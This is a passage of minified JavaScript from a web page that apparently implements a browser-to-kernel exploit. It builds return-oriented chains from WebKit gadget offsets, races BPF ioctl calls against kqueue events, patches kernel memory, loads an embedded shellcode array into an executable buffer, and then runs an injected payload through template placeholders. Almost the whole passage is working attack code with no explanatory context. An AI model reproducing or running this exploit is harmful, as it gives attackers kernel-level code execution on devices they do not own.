rop();thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);chain(thread2);p.write8(contextp,g.ret);p.write8(contextp.add32(16),thread2.stackBase);p.syscall(324,1);var retv=function(){p.fcall(createThread,longjmp,contextp,p.sptr(name));};nogc.push(contextp);nogc.push(thread2);return retv;};var interrupt1,loop1;var sock=p.syscall(97,2,2);var kscratch=p.malloc32(4096);var start1=spawnthread("GottaGoFast",function(thread2){interrupt1=thread2.stackBase;thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.pop_rdi);thread2.push(fd);thread2.push(g.pop_rsi);thread2.push(2148549243);thread2.push(g.pop_rdx);thread2.push(bpf_valid_prog);thread2.push(g.pop_rsp);thread2.push(thread2.stackBase.add32(2048));thread2.count=256;var cntr=thread2.count;thread2.push(s[54]);thread2.push_write8(thread2.stackBase.add32(cntr*8),s[54]);thread2.push(g.pop_rdi);var wherep=thread2.pushSymbolic();thread2.push(g.pop_rsi);var whatp=thread2.pushSymbolic();thread2.push(g.mov__rdi__rsi);thread2.push(g.pop_rsp);loop1=thread2.stackBase.add32(thread2.count*8);thread2.push(1094795585);thread2.finalizeSymbolic(wherep,loop1);thread2.finalizeSymbolic(whatp,loop1.sub32(8));});var krop=new rop();var race=new rop();var ctxp=p.malloc32(8192);var ctxp1=p.malloc32(8192);var ctxp2=p.malloc32(8192);p.write8(bpf_spray.add32(16),ctxp);p.write8(ctxp.add32(80),0);p.write8(ctxp.add32(104),ctxp1);var stackshift_from_retaddr=0;p.write8(ctxp1.add32(16),o2wk(19536333));stackshift_from_retaddr+=8+88;p.write8(ctxp.add32(0),ctxp2);p.write8(ctxp.add32(16),ctxp2.add32(8));p.write8(ctxp2.add32(2000),o2wk(7271653));var iterbase=ctxp2;for(var i=0;i<15;i++){p.write8(iterbase,o2wk(19536333));stackshift_from_retaddr+=8+88;p.write8(iterbase.add32(2000+32),o2wk(7271653));p.write8(iterbase.add32(8),iterbase.add32(32));p.write8(iterbase.add32(24),iterbase.add32(32+8));iterbase=iterbase.add32(32);};var raxbase=iterbase;var rdibase=iterbase.add32(8);var memcpy=get_jmptgt(webKitBase.add32(248));memcpy=p.read8(memcpy);p.write8(raxbase,o2wk(22848539));stackshift_from_retaddr+=8;p.write8(rdibase.add32(112),o2wk(19417140));stackshift_from_retaddr+=8;p.write8(rdibase.add32(24),rdibase);p.write8(rdibase.add32(8),krop.stackBase);p.write8(raxbase.add32(48),g.mov_rbp_rsp);p.write8(rdibase,raxbase);p.write8(raxbase.add32(1056),o2wk(2566497));p.write8(raxbase.add32(64),memcpy.add32(194-144));var topofchain=stackshift_from_retaddr+40;p.write8(rdibase.add32(176),topofchain);for(var i=0;i<4096/8;i++){p.write8(krop.stackBase.add32(i*8),g.ret);};krop.count=16;var kpatch=function(offset,qword){krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset);krop.push(g.add_rax_rsi);krop.push(g.pop_rsi);krop.push(qword);krop.push(g.mov__rax__rsi);};var kpatch2=function(offset,offset2){krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset2);krop.push(g.add_rax_rsi);krop.push(g.mov__rdi__rax);};p.write8(kscratch.add32(1056),g.pop_rdi);p.write8(kscratch.add32(64),g.pop_rax);p.write8(kscratch.add32(24),kscratch);krop.push(g.pop_rdi);krop.push(kscratch.add32(24));krop.push(g.mov_rbp_rsp);var rboff=topofchain-krop.count*8+40;krop.push(o2wk(2566497));krop.push(g.pop_rax);krop.push(rboff);krop.push(g.add_rdi_rax);krop.push(g.mov_rax__rdi__);krop.push(g.pop_rsi);krop.push(762);krop.push(g.add_rax_rsi);krop.push(g.mov__rdi__rax);var shellbuf=p.malloc32(4096);krop.push(g.pop_rdi);krop.push(kscratch);krop.push(g.mov__rdi__rax);krop.push(g.pop_rsi);krop.push(808116);krop.push(g.add_rax_rsi);krop.push(g.pop_rdi);krop.push(kscratch.add32(8));krop.push(g.mov__rdi__rax);krop.push(g.jmp_rax);krop.push(g.pop_rdi);krop.push(kscratch.add32(16));krop.push(g.mov__rdi__rax);krop.push(g.pop_rsi);krop.push(new int64(4294901759,4294967295));krop.push(g.and_rax_rsi);krop.push(g.mov_rdx_rax);krop.push(g.pop_rax);krop.push(kscratch.add32(8));krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(9);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.mov_rax_rdx);krop.push(g.jmp_rdi);krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(221338);krop.push(g.add_rax_rsi);krop.push(g.mov_rax__rax__);krop.push(g.pop_rdi);krop.push(kscratch.add32(816));krop.push(g.mov__rdi__rax);kpatch(221338,new int64(2425420344,2425393296));kpatch(20169540,shellbuf);kpatch(new int64(4293816070,4294967295),new int64(184,3297329408));kpatch(new int64(4293470503,4294967295),new int64(0,1082624841));kpatch(new int64(4293470533,4294967295),new int64(2425388523,1922076816));kpatch(new int64(4294769332,4294967295),new int64(934690871,826654769));kpatch(828366,new int64(233,2336788480));kpatch(1329844,new int64(2428747825,2425393296));kpatch(new int64(15789236,0),new int64(2,0));kpatch2(new int64(15789244,0),new int64(4293548276,4294967295));kpatch(new int64(15789276,0),new int64(0,1));krop.push(g.pop_rax);krop.push(kscratch.add32(8));krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(9);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.pop_rax);krop.push(kscratch.add32(16));krop.push(g.mov_rax__rax__);krop.push(g.jmp_rdi);krop.push(o2wk(380345));krop.push(kscratch.add32(4096));var kq=p.malloc32(16);var kev=p.malloc32(256);kev.backing[0]=sock;kev.backing[2]=131071;kev.backing[3]=1;kev.backing[4]=5;var shcode=[35817,2425393152,2425393296,2425393296,8567125,2303246336,1096172005,1398030677,2303275535,3149957588,256,551862601,1220806985,9831821,2370371584,4265616532,2370699263,3767542964,2370633744,1585456300,2169045059,1265721540,277432321,4202255,698,3867757568,524479,3607052544,960335176,1207959552,3224487561,2211839809,3698655723,1103114587,1096630620,2428722526,1032669269,4294967160,2303260209,15293925,1207959552,770247,2303262720,3271888842,1818324331,979595116,628633632,1815490864,2648,0,0,0,0,0,0,0,0,0,0,0,0,0,0];for(var i=0;i<shcode.length;i++){shellbuf.backing[i]=shcode[i];};start1();while(1){race.count=0;race.push(s[362]);race.push(g.pop_rdi);race.push(kq);race.push(g.mov__rdi__rax);race.push(g.ret);race.push(g.ret);race.push(g.ret);race.push(g.ret);race.push_write8(loop1,interrupt1);race.push(g.pop_rdi);race.push(fd);race.push(g.pop_rsi);race.push(2148549243);race.push(g.pop_rdx);race.push(bpf_valid_prog);race.push(s[54]);race.push(g.pop_rax);race.push(kq);race.push(g.mov_rax__rax__);race.push(g.mov_rdi_rax);race.push(g.pop_rsi);race.push(kev);race.push(g.pop_rdx);race.push(1);race.push(g.pop_rcx);race.push(0);race.push(g.pop_r8);race.push(0);race.push(s[363]);race.push(g.pop_rdi);race.push(fd1);race.push(g.pop_rsi);race.push(2148549243);race.push(g.pop_rdx);race.push(bpf_spray_prog);race.push(s[54]);race.push(g.pop_rax);race.push(kq);race.push(g.mov_rax__rax__);race.push(g.mov_rdi_rax);race.push(s[6]);race.run();if(kscratch.backing[0]!=0){p.syscall(74,shellbuf,16384,7);p.fcall(shellbuf);break;};};};var createThread=webKitBase.add32(7836560);var payloadbuf=p.malloc32(#BUF#);#PAY#for(var i=0;i<payload.length;i++){payloadbuf.backing[i]=payload[i];};p.syscall(74,payloadbuf,#BUF#,7);p.syscall(324,1);p.fcall(createThread,payloadbuf,0,p.sptr("payload"));done();}</script></body></html>
2 | 
3 | 


--------------------------------------------------------------------------------